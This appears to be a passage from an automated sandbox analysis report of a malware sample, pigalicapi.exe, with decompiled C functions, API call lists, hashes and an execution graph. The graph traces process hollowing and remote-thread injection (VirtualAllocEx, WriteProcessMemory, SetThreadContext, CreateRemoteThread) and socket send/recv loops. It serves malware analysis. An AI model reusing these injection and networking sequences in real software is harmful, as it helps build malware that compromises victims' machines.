                                                                                                                                                                                                                                                                      						 *_t43 = 0;
                                                                                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                                                                                      						_t49 = 0;
                                                                                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t61);
                                                                                                                                                                                                                                                                      						return _t49;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t44 = E00FB9826();
                                                                                                                                                                                                                                                                      					_t62 = 0x16;
                                                                                                                                                                                                                                                                      					 *_t44 = _t62;
                                                                                                                                                                                                                                                                      					E00FB976A();
                                                                                                                                                                                                                                                                      					return _t62;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}




















                                                                                                                                                                                                                                                                      0x00fc0fe2
                                                                                                                                                                                                                                                                      0x00fc1010
                                                                                                                                                                                                                                                                      0x00fc1016
                                                                                                                                                                                                                                                                      0x00fc101c
                                                                                                                                                                                                                                                                      0x00fc1024
                                                                                                                                                                                                                                                                      0x00fc102b
                                                                                                                                                                                                                                                                      0x00fc102b
                                                                                                                                                                                                                                                                      0x00fc1030
                                                                                                                                                                                                                                                                      0x00fc1037
                                                                                                                                                                                                                                                                      0x00fc103e
                                                                                                                                                                                                                                                                      0x00fc1050
                                                                                                                                                                                                                                                                      0x00fc1057
                                                                                                                                                                                                                                                                      0x00fc1076
                                                                                                                                                                                                                                                                      0x00fc1082
                                                                                                                                                                                                                                                                      0x00fc109d
                                                                                                                                                                                                                                                                      0x00fc10a0
                                                                                                                                                                                                                                                                      0x00fc10a7
                                                                                                                                                                                                                                                                      0x00fc10ad
                                                                                                                                                                                                                                                                      0x00fc10b4
                                                                                                                                                                                                                                                                      0x00fc10b7
                                                                                                                                                                                                                                                                      0x00fc10b9
                                                                                                                                                                                                                                                                      0x00fc10bd
                                                                                                                                                                                                                                                                      0x00fc10c7
                                                                                                                                                                                                                                                                      0x00fc10c7
                                                                                                                                                                                                                                                                      0x00fc10c9
                                                                                                                                                                                                                                                                      0x00fc10cf
                                                                                                                                                                                                                                                                      0x00fc10d2
                                                                                                                                                                                                                                                                      0x00fc10d4
                                                                                                                                                                                                                                                                      0x00fc10da
                                                                                                                                                                                                                                                                      0x00fc10db
                                                                                                                                                                                                                                                                      0x00fc10e1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc10bf
                                                                                                                                                                                                                                                                      0x00fc10bf
                                                                                                                                                                                                                                                                      0x00fc10bf
                                                                                                                                                                                                                                                                      0x00fc10c2
                                                                                                                                                                                                                                                                      0x00fc10c3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc10bf
                                                                                                                                                                                                                                                                      0x00fc10af
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc10af
                                                                                                                                                                                                                                                                      0x00fc1088
                                                                                                                                                                                                                                                                      0x00fc108d
                                                                                                                                                                                                                                                                      0x00fc108f
                                                                                                                                                                                                                                                                      0x00fc1091
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc1059
                                                                                                                                                                                                                                                                      0x00fc1059
                                                                                                                                                                                                                                                                      0x00fc105e
                                                                                                                                                                                                                                                                      0x00fc1060
                                                                                                                                                                                                                                                                      0x00fc1061
                                                                                                                                                                                                                                                                      0x00fc1096
                                                                                                                                                                                                                                                                      0x00fc1096
                                                                                                                                                                                                                                                                      0x00fc10e4
                                                                                                                                                                                                                                                                      0x00fc10e5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc10ee
                                                                                                                                                                                                                                                                      0x00fc0fea
                                                                                                                                                                                                                                                                      0x00fc0fea
                                                                                                                                                                                                                                                                      0x00fc0ff1
                                                                                                                                                                                                                                                                      0x00fc0ff2
                                                                                                                                                                                                                                                                      0x00fc0ff4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fc0ff9

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000104), ref: 00FC1010
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC10DB
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC10E5
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                      • API String ID: 2506810119-1494416116
                                                                                                                                                                                                                                                                      • Opcode ID: e4b6312423f952722d7fc04b974ae818aef0c99f3880f488cc5f9c479b747e3c
                                                                                                                                                                                                                                                                      • Instruction ID: cf1e73f123ef32d38622512932084bd21aded70072e40d115aed23378c76e531
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4b6312423f952722d7fc04b974ae818aef0c99f3880f488cc5f9c479b747e3c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C531E671E44249EBDB21DF95CE82E9EBBFCFB86350B10406EE504D7202D6758E81EB91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E00FBA7B0(signed int _a4) {
                                                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                                                                                      				WCHAR* _t22;
                                                                                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t9 = _a4;
                                                                                                                                                                                                                                                                      				_t25 = 0x104df50 + _t9 * 4;
                                                                                                                                                                                                                                                                      				_t24 =  *_t25;
                                                                                                                                                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                                                                                                                                                      					_t22 =  *(0x1006c50 + _t9 * 4);
                                                                                                                                                                                                                                                                      					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						 *_t25 = _t27;
                                                                                                                                                                                                                                                                      						if( *_t25 != 0) {
                                                                                                                                                                                                                                                                      							FreeLibrary(_t27);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t13 = _t27;
                                                                                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                                                                                      						return _t13;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t15 = GetLastError();
                                                                                                                                                                                                                                                                      					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                                      						_t27 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                                      						_t27 = _t15;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						goto L8;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                                      						_t13 = 0;
                                                                                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t4 = _t24 + 1; // 0xfe5fa47f
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                                      			}










                                                                                                                                                                                                                                                                      0x00fba7b5
                                                                                                                                                                                                                                                                      0x00fba7b9
                                                                                                                                                                                                                                                                      0x00fba7c0
                                                                                                                                                                                                                                                                      0x00fba7c4
                                                                                                                                                                                                                                                                      0x00fba7d2
                                                                                                                                                                                                                                                                      0x00fba7e8
                                                                                                                                                                                                                                                                      0x00fba7ec
                                                                                                                                                                                                                                                                      0x00fba815
                                                                                                                                                                                                                                                                      0x00fba817
                                                                                                                                                                                                                                                                      0x00fba81b
                                                                                                                                                                                                                                                                      0x00fba81e
                                                                                                                                                                                                                                                                      0x00fba81e
                                                                                                                                                                                                                                                                      0x00fba824
                                                                                                                                                                                                                                                                      0x00fba826
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba827
                                                                                                                                                                                                                                                                      0x00fba7ee
                                                                                                                                                                                                                                                                      0x00fba7f7
                                                                                                                                                                                                                                                                      0x00fba806
                                                                                                                                                                                                                                                                      0x00fba7f9
                                                                                                                                                                                                                                                                      0x00fba7fc
                                                                                                                                                                                                                                                                      0x00fba802
                                                                                                                                                                                                                                                                      0x00fba802
                                                                                                                                                                                                                                                                      0x00fba80a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba80c
                                                                                                                                                                                                                                                                      0x00fba80f
                                                                                                                                                                                                                                                                      0x00fba811
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba811
                                                                                                                                                                                                                                                                      0x00fba80a
                                                                                                                                                                                                                                                                      0x00fba7c6
                                                                                                                                                                                                                                                                      0x00fba7cb
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00FBA757,?,00000000,00000000,00000000,?,00FBA954,00000006,FlsSetValue), ref: 00FBA7E2
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00FBA757,?,00000000,00000000,00000000,?,00FBA954,00000006,FlsSetValue,010071D0,FlsSetValue,00000000,00000364,?,00FB9D02), ref: 00FBA7EE
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FBA757,?,00000000,00000000,00000000,?,00FBA954,00000006,FlsSetValue,010071D0,FlsSetValue,00000000), ref: 00FBA7FC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                      • Opcode ID: 74d05c7614f41032d63e2e86d4142c72e38c159289ac330796ce86dd7720d5d2
                                                                                                                                                                                                                                                                      • Instruction ID: 6806ccfd97e30a52d19b1ab732079946335ee4893891e109606588ad10b5c05c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74d05c7614f41032d63e2e86d4142c72e38c159289ac330796ce86dd7720d5d2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01D433B55226AFC7314B7AAC48EA63798EF087B17200630E90AD7540DB21D802EAE1
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00FBF89A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBFEDF: ___AdjustPointer.LIBCMT ref: 00FBFF29
                                                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00FBF8B1
                                                                                                                                                                                                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00FBF8C3
                                                                                                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00FBF8E7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                      • Opcode ID: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                      • Instruction ID: 5c4929319eb895ec98f36b9231b841ab81f16ee64e9004a7a29237adabc80fee
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF012532400109BBCF129F56CC01EEA3BBAFF49724F158428FD1866121C736E8A5EFA0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FBF376() {
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				E00FC07C7();
                                                                                                                                                                                                                                                                      				E00FC075B();
                                                                                                                                                                                                                                                                      				if(E00FC049E() != 0) {
                                                                                                                                                                                                                                                                      					_t4 = E00FBF4B6(_t8, __eflags);
                                                                                                                                                                                                                                                                      					__eflags = _t4;
                                                                                                                                                                                                                                                                      					if(_t4 != 0) {
                                                                                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						E00FC04DA();
                                                                                                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					L1:
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                                                      0x00fbf376
                                                                                                                                                                                                                                                                      0x00fbf37b
                                                                                                                                                                                                                                                                      0x00fbf387
                                                                                                                                                                                                                                                                      0x00fbf38c
                                                                                                                                                                                                                                                                      0x00fbf391
                                                                                                                                                                                                                                                                      0x00fbf393
                                                                                                                                                                                                                                                                      0x00fbf39e
                                                                                                                                                                                                                                                                      0x00fbf395
                                                                                                                                                                                                                                                                      0x00fbf395
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbf395
                                                                                                                                                                                                                                                                      0x00fbf389
                                                                                                                                                                                                                                                                      0x00fbf389
                                                                                                                                                                                                                                                                      0x00fbf38b
                                                                                                                                                                                                                                                                      0x00fbf38b

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00FBF376
                                                                                                                                                                                                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00FBF37B
                                                                                                                                                                                                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00FBF380
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC049E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00FC04AF
                                                                                                                                                                                                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00FBF395
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                      • Opcode ID: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                      • Instruction ID: c133b67cef5d88a07f5bcdac38ccd80e915cfa9e9f1f457954b2ace165b1799d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42C04C19411343D01D68BAB36F13FEF33800C66BD4B8814E9A941574435D0E140F7E72
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:2.1%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:98.7%
                                                                                                                                                                                                                                                                      Signature Coverage:3.9%
                                                                                                                                                                                                                                                                      Total number of Nodes:1153
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:14
                                                                                                                                                                                                                                                                      execution_graph 17573 401000 17575 401005 17573->17575 17576 401014 LoadLibraryExA 17575->17576 17578 401056 GetProcAddress 17576->17578 17581 401126 VirtualAlloc 17578->17581 17582 40114e 17581->17582 17583 401083 GetPEB 17582->17583 17588 4011cd 17582->17588 17585 4011b4 17592 4001989 17585->17592 17611 4001780 WSAStartup 17585->17611 17589 40124a 17588->17589 17591 4011e6 17588->17591 17589->17585 17590 4011f1 LoadLibraryExA 17590->17589 17590->17591 17591->17589 17591->17590 17593 40017b6 17592->17593 17595 400198b Sleep 17593->17595 17596 40017de CreateEventA 17593->17596 17631 4001490 17593->17631 17595->17593 17648 40023e0 17596->17648 17601 400196e WaitForSingleObject Sleep 17602 400199b WSACleanup 17601->17602 17606 40019a0 ExitProcess 17602->17606 17604 40023e0 32 API calls 17607 4001891 17604->17607 17605 4001831 CreateThread 17605->17607 17725 4001630 48 API calls 17605->17725 17607->17601 17607->17604 17608 4001dc0 8 API calls 17607->17608 17663 4001470 GetProcessHeap RtlAllocateHeap 17607->17663 17608->17607 17610 4001903 CreateThread 17610->17607 17711 4001630 17610->17711 17612 40019a0 ExitProcess 17611->17612 17614 40017a2 17611->17614 17613 4001490 18 API calls 17613->17614 17614->17613 17615 400198b Sleep 17614->17615 17617 40017de CreateEventA 17614->17617 17616 4001996 17615->17616 17616->17614 17618 40023e0 32 API calls 17617->17618 17619 4001804 17618->17619 17620 4001891 17619->17620 17621 4001dc0 8 API calls 17619->17621 17623 400196e WaitForSingleObject Sleep 17620->17623 17626 40023e0 32 API calls 17620->17626 17628 4001dc0 8 API calls 17620->17628 17727 4001470 GetProcessHeap RtlAllocateHeap 17620->17727 17622 4001827 17621->17622 17726 4001470 GetProcessHeap RtlAllocateHeap 17622->17726 17624 400199b WSACleanup 17623->17624 17624->17612 17626->17620 17627 4001831 CreateThread 17627->17620 17729 4001630 48 API calls 17627->17729 17628->17620 17630 4001903 CreateThread 17630->17620 17728 4001630 48 API calls 17630->17728 17633 40014c2 17631->17633 17632 400161a 17632->17593 17633->17632 17664 4001430 17633->17664 17636 4001430 QueryPerformanceCounter 17637 4001524 17636->17637 17667 4001160 socket 17637->17667 17640 400160d Sleep 17640->17632 17641 400155f 17676 40013b0 17641->17676 17690 4001f80 17648->17690 17651 4001dc0 17652 4001827 17651->17652 17653 4001dd7 17651->17653 17662 4001470 GetProcessHeap RtlAllocateHeap 17652->17662 17653->17652 17654 4001de1 VirtualAlloc 17653->17654 17654->17652 17655 4001e2a VirtualAllocEx 17654->17655 17656 4001e4f VirtualAllocEx 17655->17656 17658 4001e87 17655->17658 17657 4001e6f VirtualFree 17656->17657 17656->17658 17657->17652 17659 4001f03 WriteProcessMemory 17658->17659 17660 4001f22 VirtualFree 17659->17660 17661 4001f37 VirtualFree CreateRemoteThread 17659->17661 17660->17652 17661->17652 17662->17605 17663->17610 17665 4001440 QueryPerformanceCounter 17664->17665 17666 400143c 17664->17666 17665->17666 17666->17636 17668 4001182 htons gethostbyname 17667->17668 17674 400117a 17667->17674 17671 40011ab 17668->17671 17668->17674 17669 40011fa 17672 4001218 17669->17672 17673 400120a closesocket 17669->17673 17670 40011e7 connect 17670->17669 17670->17671 17671->17669 17671->17670 17672->17674 17675 400121e setsockopt setsockopt 17672->17675 17673->17674 17674->17640 17674->17641 17675->17674 17677 4001411 lstrcat GetTickCount 17676->17677 17679 40013c3 17676->17679 17680 40010e0 17677->17680 17678 40013e3 QueryPerformanceCounter Sleep 17678->17679 17679->17677 17679->17678 17681 40010ec 17680->17681 17684 40010f2 17680->17684 17682 4001103 send 17681->17682 17683 400113a send 17681->17683 17681->17684 17682->17681 17682->17684 17683->17684 17685 4001040 17684->17685 17686 4001052 closesocket 17685->17686 17687 400104c 17685->17687 17686->17632 17687->17686 17688 4001067 recv 17687->17688 17689 4001094 GetTickCount 17687->17689 17688->17687 17689->17687 17691 4001804 17690->17691 17692 4001f93 GetEnvironmentVariableA lstrcat 17690->17692 17691->17607 17691->17651 17693 4001fc2 lstrcat lstrcat 17692->17693 17694 4001fe5 17692->17694 17693->17694 17695 4002008 VirtualAlloc 17694->17695 17695->17691 17696 400206d CreateProcessA 17695->17696 17697 40020b2 VirtualAllocEx 17696->17697 17698 400209a VirtualFree 17696->17698 17699 40020e3 VirtualAllocEx 17697->17699 17701 400214d 17697->17701 17698->17691 17700 400210c TerminateProcess CloseHandle CloseHandle VirtualFree 17699->17700 17699->17701 17700->17691 17702 400224b WriteProcessMemory 17701->17702 17703 4002270 TerminateProcess CloseHandle CloseHandle VirtualFree 17702->17703 17704 40022b1 VirtualFree GetThreadContext 17702->17704 17703->17691 17705 4002314 WriteProcessMemory 17704->17705 17706 40022e4 TerminateProcess CloseHandle CloseHandle 17704->17706 17707 4002367 SetThreadContext 17705->17707 17708 400233a TerminateProcess CloseHandle CloseHandle 17705->17708 17706->17691 17709 4002394 ResumeThread 17707->17709 17710 40023a9 TerminateProcess CloseHandle CloseHandle 17707->17710 17708->17691 17709->17691 17710->17691 17712 4001640 CoInitialize 17711->17712 17713 4001766 17711->17713 17712->17713 17714 4001668 17712->17714 17714->17713 17715 400167c WaitForSingleObject 17714->17715 17718 40016cc Sleep 17714->17718 17719 40016e5 SetEvent 17714->17719 17720 40016f6 CloseHandle Sleep 17714->17720 17716 40016a3 GetExitCodeProcess 17715->17716 17717 400168f TerminateProcess 17715->17717 17716->17714 17717->17713 17718->17714 17719->17713 17721 40023e0 32 API calls 17720->17721 17724 4001723 17721->17724 17722 4001735 17722->17713 17723 4001dc0 8 API calls 17723->17724 17724->17714 17724->17722 17724->17723 17726->17627 17727->17630 17739 4002400 17740 4002420 VirtualAlloc 17739->17740 17741 400250f 17739->17741 17742 4002467 VirtualAlloc 17740->17742 17743 400247d 17740->17743 17742->17743 17743->17741 17745 4001a50 17743->17745 17748 4001a30 GetPEB 17745->17748 17747 4001a88 17747->17741 17748->17747 17749 401a200 17764 4019e9d codecvt _strnlen 17749->17764 17750 401a215 17751 4019a80 __VEC_memcpy 17750->17751 17752 401a23b 17751->17752 17754 401a37a 17752->17754 17755 4006ca0 _realloc __VEC_memcpy 17752->17755 17753 401a3b9 17756 4019a80 __VEC_memcpy 17753->17756 17761 401a26f 17755->17761 17758 401a3df 17756->17758 17757 4019ea9 17759 401a54a 17758->17759 17760 4006ca0 _realloc __VEC_memcpy 17758->17760 17763 401a413 17760->17763 17762 4019a80 __VEC_memcpy 17761->17762 17762->17754 17763->17759 17765 4006ca0 _realloc __VEC_memcpy 17763->17765 17764->17750 17764->17753 17764->17757 17766 4019fb2 17764->17766 17765->17759 17776 4019a80 17766->17776 17775 401a130 17778 4019a8d _memset codecvt 17776->17778 17777 4019aab 17777->17775 17780 4006ca0 17777->17780 17778->17777 17779 4006ca0 _realloc __VEC_memcpy 17778->17779 17779->17778 17781 4006cb8 17780->17781 17782 4006ce7 17781->17782 17783 4006cdf __VEC_memcpy 17781->17783 17783->17782 18405 40264c3 18422 40263dd _Smanip codecvt 18405->18422 18406 40264d8 18424 4025580 18406->18424 18411 40255a0 __VEC_memcpy 18412 4026555 18411->18412 18413 40255a0 __VEC_memcpy 18412->18413 18420 402657a 18413->18420 18414 4024ae0 __VEC_memcpy 18414->18422 18416 4026403 18417 4026697 18418 4024ae0 __VEC_memcpy 18417->18418 18419 40266b1 codecvt 18418->18419 18420->18417 18430 4024ae0 18420->18430 18422->18406 18422->18414 18422->18416 18423 40255a0 __VEC_memcpy 18422->18423 18434 40255c0 18422->18434 18423->18422 18425 4024ae0 __VEC_memcpy 18424->18425 18426 402559b 18425->18426 18427 40255a0 18426->18427 18428 4024ae0 __VEC_memcpy 18427->18428 18429 40255bb 18428->18429 18429->18411 18432 4024aea _memset codecvt 18430->18432 18431 4024af6 18431->18417 18432->18431 18433 4006ca0 __VEC_memcpy _realloc 18432->18433 18433->18432 18435 40257f0 codecvt setSBUpLow 18434->18435 18436 40255e4 18434->18436 18435->18422 18450 4022540 18436->18450 18438 402563f 18438->18435 18439 4006ca0 _realloc __VEC_memcpy 18438->18439 18440 40256e8 18439->18440 18441 4006ca0 _realloc __VEC_memcpy 18440->18441 18442 402570f 18441->18442 18443 4006ca0 _realloc __VEC_memcpy 18442->18443 18444 4025757 18443->18444 18445 4006ca0 _realloc __VEC_memcpy 18444->18445 18446 402579d 18445->18446 18447 4006ca0 _realloc __VEC_memcpy 18446->18447 18448 40257c4 18447->18448 18449 4006ca0 _realloc __VEC_memcpy 18448->18449 18449->18435 18451 4022565 18450->18451 18453 4022647 codecvt 18450->18453 18452 4006ca0 _realloc __VEC_memcpy 18451->18452 18451->18453 18452->18453 18453->18438 18454 4018ec0 18455 4018ec3 18454->18455 18456 4018ed6 18455->18456 18458 40196c0 18455->18458 18459 40196d0 codecvt 18458->18459 18460 4019847 18459->18460 18462 401b730 18459->18462 18460->18455 18476 401b747 